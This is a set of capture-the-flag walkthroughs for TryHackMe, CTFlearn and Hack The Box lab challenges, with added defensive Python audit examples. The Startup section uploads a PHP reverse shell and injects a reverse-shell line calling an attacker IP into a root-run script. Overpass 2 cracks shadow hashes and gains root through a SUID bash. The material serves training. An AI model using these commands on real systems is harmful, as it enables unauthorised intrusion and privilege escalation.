TryHackMe solution: Overpass 2 – Hacked

Link: https://tryhackme.com/room/overpass2hacked

Task 1: Forensics – Analyse the PCAP

#1 “What was the URL of the page they used to upload a reverse shell?”

Download the pcapng file, open it in Wireshark, and follow the TCP stream (Analyze > Follow > TCP Stream). The answer is in Stream 0.

#2 “What payload did the attacker use to gain access?”

The answer is in Stream 1.

#3 “What password did the attacker use to privesc?”
#4 “How did the attacker establish persistence?”

The answer is in Stream 3.

#5 “Using the fasttrack wordlist, how many of the system passwords were crackable?”

Save the contents of /etc/shadow from Stream 3 to a file named “shadow”.

Download the fasttrack wordlist.

Next, we use John the Ripper to crack the passwords.

This link tells us how to install and use John the Ripper.

john-the-ripper shadow -w=fasttrack.txt
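As an added example (not part of the room or this writeup), the following Python audits the fields of a shadow-format file the way a defender would before reaching for a cracker: it classifies each account by hash algorithm and flags locked, empty and legacy-weak entries, which is exactly the set of accounts a wordlist run can touch. The shadow lines and hash values are constructed placeholders, not the ones from the capture.

```python
import re

# Constructed sample /etc/shadow lines (not from the room's capture): the hash bodies
# are placeholders; only the field layout and the hash prefixes matter for this audit.
SAMPLE_SHADOW = """\
root:$6$abcdefgh$PLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDERHASH:18700:0:99999:7:::
james:$6$ijklmnop$PLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDERHASH:18700:0:99999:7:::
legacy:$1$qrstuvwx$PLACEHOLDERMD5CRYPT:18700:0:99999:7:::
olddes:abJnggxhB/yWI:18700:0:99999:7:::
svc:*:18700:0:99999:7:::
guest::18700:0:99999:7:::
"""

# crypt(3) prefix -> (algorithm name, still an acceptable choice today?)
ALGORITHMS = {
    "$1$": ("md5crypt", False),
    "$2a$": ("bcrypt", True),
    "$2b$": ("bcrypt", True),
    "$2y$": ("bcrypt", True),
    "$5$": ("sha256crypt", True),
    "$6$": ("sha512crypt", True),
    "$7$": ("scrypt", True),
    "$y$": ("yescrypt", True),
}


def classify_hash(field):
    """Return (status, algorithm) for one shadow password field."""
    if field == "":
        return ("EMPTY", None)           # passwordless login: critical
    if field.startswith(("!", "*")):
        return ("LOCKED", None)          # no password login possible
    for prefix, (name, acceptable) in ALGORITHMS.items():
        if field.startswith(prefix):
            return ("OK" if acceptable else "WEAK", name)
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return ("WEAK", "descrypt")      # traditional DES: 8-char max, trivially cracked
    return ("UNKNOWN", None)


def audit_shadow(text):
    """Parse shadow-format text; return {user: (status, algorithm)}."""
    result = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        result[fields[0]] = classify_hash(fields[1])
    return result


def accounts_with_passwords(text):
    """Accounts that accept a password at all, i.e. the ones a wordlist run can hit."""
    return sorted(user for user, (status, _) in audit_shadow(text).items()
                  if status in ("OK", "WEAK", "EMPTY"))


if __name__ == "__main__":
    for user, (status, algo) in audit_shadow(SAMPLE_SHADOW).items():
        print(f"{user:10} {status:8} {algo or '-'}")
```

Locked accounts (`*` or `!`) never fall to a cracker no matter what john reports; the accounts worth worrying about are the WEAK and EMPTY ones, and the OK ones only if their passwords are in a public wordlist.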

Task 2: Research – Analyse the code

#1 “What’s the default hash for the backdoor?”
#2 “What’s the hardcoded salt for the backdoor?”

Open the GitHub link from Stream 3 and read main.go to get the answers.

#3 “What was the hash that the attacker used? – go back to the PCAP for this!”

The answer is in Stream 3.

#4 “Crack the hash using rockyou and a cracking tool of your choice. What’s the password?”

Copy the hash and the salt into a file in the format:

hash$salt

and use John the Ripper with rockyou.txt to crack it.

john-the-ripper hash --format='dynamic=sha512($p.$s)' -w=rockyou.txt
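To make the `hash$salt` layout concrete, here is an added Python example (not code from the room or from the backdoor's repository) that reproduces the sha512($p.$s) scheme john's format name describes, builds the john input line, and verifies a candidate against a stored digest. The salt and password are constructed values, not the real ones from main.go or the PCAP.

```python
import hashlib
import hmac

# Constructed values for illustration; the room's real salt and hash live in main.go and the PCAP.
EXAMPLE_SALT = "example-hardcoded-salt"
EXAMPLE_PASSWORD = "correct horse"


def backdoor_hash(password, salt):
    """sha512(password + salt) as lowercase hex: the scheme john calls dynamic=sha512($p.$s)."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def john_line(digest, salt):
    """One input line for john --format='dynamic=sha512($p.$s)': <hash>$<salt>."""
    return f"{digest}${salt}"


def parse_john_line(line):
    """Inverse of john_line: the hex digest never contains '$', so split on the first one."""
    digest, salt = line.split("$", 1)
    return digest, salt


def verify(candidate, salt, digest):
    """Constant-time comparison of a candidate's hash against the stored digest."""
    return hmac.compare_digest(backdoor_hash(candidate, salt), digest)


if __name__ == "__main__":
    d = backdoor_hash(EXAMPLE_PASSWORD, EXAMPLE_SALT)
    print(john_line(d, EXAMPLE_SALT))
```

Because the salt is compiled into the binary, every deployment of the backdoor shares it, so one wordlist run for that salt covers all of them; a single plain SHA-512 per guess is also far cheaper than a purpose-built password hash, which is why a public wordlist gets there in minutes.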

Task 3: Attack – Get back in!

#1 “The attacker defaced the website. What message did they leave as a heading?”

Access the webpage: http://10.10.175.129/

#2 “What’s the user flag?”

In Stream 3, we found that we can connect over SSH on port 2222.

ssh james@10.10.140.222 -p 2222

Use the password we found in Task 2.

#3 “What’s the root flag?”

The hint is: “Did the attacker leave a quick way for them to get root again without a password?”

This refers to a file named “.suid_bash” in /home/james, and we can get root with:

./.suid_bash -p

We can get the explanation here.

CTFlearn solution: Blank Page

Opening the file with xxd, we get:

xxd TheMessage.txt

We see a lot of spaces and dots. So I think about converting the string into binary with a little code.

# Map every space to '0' and every other character to '1',
# inserting a separator before each group of 8 bits
with open("TheMessage.txt", "r") as inp:
    l = list(inp.read())

string = ""
for i in range(0, len(l)):
    if l[i] == " ":
        l[i] = '0'
    else:
        l[i] = '1'
    if i % 8 == 0:
        string += ' '   # also puts one leading space before the first bit
    string += l[i]

with open("output.txt", "w") as outp:
    outp.write(string)

Run that script and we get a binary string; decode it and we find the flag.

From The Global Anti-Terrorists Tactics

If you read this you passed. Congrats.
Your first task will come tomorrow.
Good luck.

CTFlearn{If_y0u_r3/\d_thi5_you_pa553d}

Flag: CTFlearn{If_y0u_r3/\d_thi5_you_pa553d}
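As an added example (not the challenge's code), the following Python carries the decoding through to text and generalises the script above: it maps spaces to 0 and dots to 1 while skipping any other character such as a newline, groups the bits into bytes, and decodes them as ASCII. The sample input is constructed by the included encoder rather than taken from TheMessage.txt.

```python
def whitespace_to_bits(text, zero=" ", one="."):
    """Map each space to '0' and each dot to '1'; any other character (e.g. newline) is skipped."""
    return "".join("0" if ch == zero else "1" for ch in text if ch in (zero, one))


def bits_to_text(bits):
    """Decode a bit string 8 bits at a time into ASCII; a trailing partial byte is ignored."""
    chars = []
    for i in range(0, len(bits) - len(bits) % 8, 8):
        chars.append(chr(int(bits[i:i + 8], 2)))
    return "".join(chars)


def decode_message(text):
    """Full pipeline: whitespace/dot text -> bits -> ASCII."""
    return bits_to_text(whitespace_to_bits(text))


def encode_message(plain, zero=" ", one="."):
    """The inverse encoding, used here only to build a constructed sample input."""
    return "".join(one if b == "1" else zero
                   for ch in plain for b in format(ord(ch), "08b"))


# Constructed sample (not the challenge file): the word "Hi" as spaces and dots.
SAMPLE = encode_message("Hi")

if __name__ == "__main__":
    print(repr(SAMPLE))
    print(decode_message(SAMPLE))
```

Skipping characters that are neither space nor dot is the one behavioural difference from the script above, which turns a stray newline into a 1 bit and shifts every byte after it.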

TryHackMe solution: Startup

Link: https://tryhackme.com/room/startup

Enumeration

#1 “What is the secret spicy soup recipe?”

First, we use:

nmap -sC -sV 10.10.195.79

to find open ports in the machine.

Port 21 is open, so we connect to the server over FTP.

ftp 10.10.195.79

Let’s try anonymous login with:

Name:     anonymous
Password: anonymous

There is a folder named ftp, and we can upload php-reverse-shell.php to the server (after changing the IP).

Using dirsearch, we find a folder named files.

And there we find the location of our shell.

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Then, we access the link: http://10.10.195.79/files/ftp/shell.php

to trigger a reverse shell.

Then we find a file named “recipe.txt”, which contains the first flag.

Foothold

#2 “What are the contents of user.txt?”

There is a folder /home/lennie, but we cannot access it.

We find a “suspicious.pcapng” file in /incidents.

We can host an HTTP server with Python from there:

python3 -m http.server

Then, we access the link: http://10.10.195.79:8000/

and download this file.

Open it in Wireshark, follow the TCP stream, and we find a password.

Use:

python3 -c 'import pty; pty.spawn("/bin/sh")'

to spawn a TTY shell.

Then use:

su lennie

with the password, and we switch to lennie.

We can find the second flag.

Privilege Escalation

#3 “What are the contents of root.txt?”

There is a folder named scripts.

Reading the file “planner.sh”, we can see that lennie will execute the file /etc/print.sh.

Go to /etc and check the file permissions of print.sh: lennie is the owner.

Then, we inject code into this file:

#!/bin/bash
sh -i >& /dev/udp/10.6.63.158/4242 0>&1

Stand up a netcat listener on port 4242.

nc -lvup 4242

Then run file print.sh.

./print.sh

And we find the root flag.
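From the defender's side, the weakness here is a script run by a privileged job that calls a second script an unprivileged user can edit. The following added Python (not part of the room or this writeup) scans a job script for the absolute paths it references and reports those that are owned by someone else or are group/world writable. The demo builds a constructed planner.sh/print.sh pair in a temporary directory; the trusted_uid parameter is a hypothetical stand-in for the uid the job actually runs as (0 for a root cron job).

```python
import os
import re
import stat
import tempfile

# A simple lexical scan for absolute paths, not a shell parser.
ABS_PATH = re.compile(r"(?<![\w./-])(/[\w./-]+)")


def referenced_scripts(script_text):
    """Absolute paths mentioned in a script body, deduplicated and sorted."""
    return sorted(set(ABS_PATH.findall(script_text)))


def writable_by_unprivileged(path, trusted_uid=0):
    """True if anyone other than trusted_uid could modify the file:
    it is owned by someone else, or it is group- or world-writable."""
    st = os.stat(path)
    if st.st_uid != trusted_uid:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_job(script_path, trusted_uid=0):
    """For a script run by a privileged job, list the referenced files others could edit."""
    with open(script_path) as f:
        body = f.read()
    return [ref for ref in referenced_scripts(body)
            if os.path.isfile(ref) and writable_by_unprivileged(ref, trusted_uid)]


def demo():
    """Constructed scenario in a temp dir: a planner script that calls a helper
    script which is world-writable (the misconfiguration), then the fixed mode."""
    d = tempfile.mkdtemp()
    helper = os.path.join(d, "print.sh")
    with open(helper, "w") as f:
        f.write("#!/bin/bash\necho 'printing'\n")
    os.chmod(helper, 0o666)                        # anyone can rewrite the helper
    planner = os.path.join(d, "planner.sh")
    with open(planner, "w") as f:
        f.write(f"{helper}\n")                     # the job just invokes the helper
    me = os.getuid()                               # treat the current user as the job's uid
    before = audit_job(planner, trusted_uid=me)    # helper is flagged
    os.chmod(helper, 0o744)                        # fix: only the owner can write
    after = audit_job(planner, trusted_uid=me)     # nothing flagged
    return before, after


if __name__ == "__main__":
    flagged, clean = demo()
    print("before fix:", flagged)
    print("after fix: ", clean)
```

On a real host the same check is worth running with trusted_uid=0 against every script a root cron entry or systemd timer invokes; ownership by a non-root user is as dangerous as a world-writable bit, since the owner can always chmod the file back.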

CTFlearn solution: abandoned place

We have a hint:

another hint: dimensions, dimensions, everything is in dimensions.

Then we think about changing the width and height stored in the image.

This question from Quora helps a lot.

Open the image with a hex editor and change the dimension fields slightly.

Then we have a new image with the flag in it.

Flag: urban_exploration

Hack The Box solution: USB Ripper

We have a syslog file and a file named “auth.json“.

There are many strings in “auth.json” and syslog, so I think about comparing the two files to find what is in one but not in the other.

I use this Python code:

import re

# Every hex token that appears in auth.json: the authorised serial numbers
with open("auth.json") as f:
    authJson = re.findall("[A-F0-9]+", f.read())

# Every "SerialNumber: ..." line the kernel wrote to syslog
with open("syslog") as f:
    strList = re.findall("SerialNumber: [A-F0-9]+\n", f.read())

# Keep only the serial number from each matched line
authList = []
for string in strList:
    authList.append(re.findall("[A-F0-9]+", string)[0])

# Print any logged serial that is not in auth.json
for auth in authList:
    if auth not in authJson:
        print(auth)

And we found: 71DF5A33EFFDEA5B1882C9FBDC1240C6
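Generalising the script above, this added Python (not the challenge's files or code) turns the comparison into a reusable check: it pulls every hex token out of auth.json as the allowlist, parses the syslog SerialNumber lines together with their timestamps, and reports each unknown serial with the time it was first plugged in. Both the syslog lines and the auth.json content are constructed samples.

```python
import json
import re

# Constructed sample syslog lines (not the challenge's syslog).
SAMPLE_SYSLOG = """\
Jan  8 09:12:01 host kernel: [  100.1] usb 1-1: new high-speed USB device number 3 using xhci_hcd
Jan  8 09:12:01 host kernel: [  100.2] usb 1-1: New USB device found, idVendor=0781, idProduct=5567
Jan  8 09:12:01 host kernel: [  100.3] usb 1-1: SerialNumber: 0123456789ABCDEF
Jan  8 11:45:22 host kernel: [ 9302.4] usb 1-2: New USB device found, idVendor=0951, idProduct=1666
Jan  8 11:45:22 host kernel: [ 9302.5] usb 1-2: SerialNumber: DEADBEEFCAFEF00D
Jan  8 11:50:03 host kernel: [ 9583.0] usb 1-2: SerialNumber: DEADBEEFCAFEF00D
"""

# Constructed auth.json content; its exact structure does not matter because the
# allowlist is built from hex tokens, as in the script above.
SAMPLE_AUTH_JSON = json.dumps({"authorized": [
    {"serial": "0123456789ABCDEF", "owner": "alice"},
]})

HEX_TOKEN = re.compile(r"\b[A-Fa-f0-9]{8,}\b")
SERIAL_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*SerialNumber: (?P<serial>[A-Fa-f0-9]+)\s*$"
)


def load_allowlist(auth_json_text):
    """Hex tokens of at least 8 characters found anywhere in auth.json, upper-cased."""
    return {tok.upper() for tok in HEX_TOKEN.findall(auth_json_text)}


def unauthorized_devices(syslog_text, allowlist):
    """Return {serial: timestamp first seen} for logged devices not on the allowlist."""
    seen = {}
    for line in syslog_text.splitlines():
        m = SERIAL_LINE.match(line)
        if not m:
            continue
        serial = m.group("serial").upper()
        if serial not in allowlist and serial not in seen:
            seen[serial] = m.group("ts")
    return seen


if __name__ == "__main__":
    for serial, ts in unauthorized_devices(SAMPLE_SYSLOG, load_allowlist(SAMPLE_AUTH_JSON)).items():
        print(f"{ts}  unknown USB device {serial}")
```

Upper-casing both sides avoids a false alarm when one file records serials in lower case, and keeping the first timestamp gives the incident timeline the challenge's one-line result lacks.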

The hint is “Note: once you find it, "crack" it.”

So, I use CrackStation to crack the string.

Flag: HTB{mychemicalromance}

CTFlearn solution: Naughty Cat

First, we use binwalk to see what is inside the image.

Then, extract all those files with:

binwalk --extract --dd=".*" cut3_c4t.png

We find a .mp3 file and a .rar file.

Open the .mp3 file in a spectrum analyzer to view its spectrogram.

We found a string:

sp3ctrum_1s_y0ur_fr13nd

Open the .rar file and we find nothing, so open it with a hex editor.

We can see that the file signature is not RAR's, so we have to fix it.

Then we can open the archive and find a .txt file.

To open it we need a password; let's use the string from the .mp3 file.

We find a string: ZjByM241MWNzX21hNXQzcg==

Decode that base64 string to get the flag.

Flag: f0r3n51cs_ma5t3r

Hack The Box solution: Illumination

In this challenge, we have a folder with a ‘.git’ folder inside.

I use GitTools to extract the commits and their content from the broken repository. Then we have 16 commits:

There is a ‘config.json’ file inside these folders.

And we can find the token there. Decode it and we find the flag.

Flag: HTB{v3rsi0n_c0ntr0l_am_I_right?}

CTFlearn solution: Seeing is believing

In this challenge, we have a file named ‘help.me’ that we cannot open, so I use the file command.

file help.me

It is an .ogg file, so we rename it to help.ogg and open it in a spectrum analyzer to view the spectrogram.
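Both the mis-signed .rar in Naughty Cat and the ‘help.me’ file here come down to the same check the file command performs: compare the leading bytes with known signatures. As an added example (not from either challenge), this Python identifies a format from its magic bytes, reports when the extension disagrees, and rewrites a corrupted header the way the hex-editor fix does; the two sample files are constructed byte strings.

```python
# Known file signatures (magic bytes) for the formats met in these challenges.
SIGNATURES = [
    ("png", b"\x89PNG\r\n\x1a\n"),
    ("rar", b"Rar!\x1a\x07\x00"),       # RAR 4.x
    ("rar", b"Rar!\x1a\x07\x01\x00"),   # RAR 5.x
    ("ogg", b"OggS"),
    ("mp3", b"ID3"),                    # MP3 with an ID3v2 tag
    ("zip", b"PK\x03\x04"),
    ("gif", b"GIF89a"),
    ("jpg", b"\xff\xd8\xff"),
]


def identify(data):
    """Return the format name whose signature matches the leading bytes, or None."""
    for name, magic in SIGNATURES:
        if data.startswith(magic):
            return name
    return None


def extension_mismatch(filename, data):
    """(claimed, actual) when the extension disagrees with the magic bytes, else None."""
    claimed = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    actual = identify(data)
    if actual is None or claimed == actual:
        return None
    return (claimed, actual)


def repair_header(data, fmt):
    """Overwrite the leading bytes with fmt's signature: the hex-editor fix from
    Naughty Cat, for a header that was deliberately damaged."""
    magic = next(m for n, m in SIGNATURES if n == fmt)
    return magic + data[len(magic):]


# Constructed samples: an OGG stream mislabeled as help.me, and a RAR archive
# whose first four signature bytes were zeroed.
SAMPLES = {
    "help.me": b"OggS\x00\x02" + b"\x00" * 26,
    "archive.rar": b"\x00\x00\x00\x00\x1a\x07\x00" + b"\x00" * 64,
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, identify(data), extension_mismatch(name, data))
```

A file whose extension and signature disagree is the usual sign of either a renamed file (help.me) or a tampered header (the .rar); in a forensic triage the same mismatch check is what flags executables hidden behind image extensions.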

We can see a QR code; scan it and we get a link: https://pastebin.com/zhEhyp3G

Flag: the_flag_is{A_sP3c7r0grAm?!}
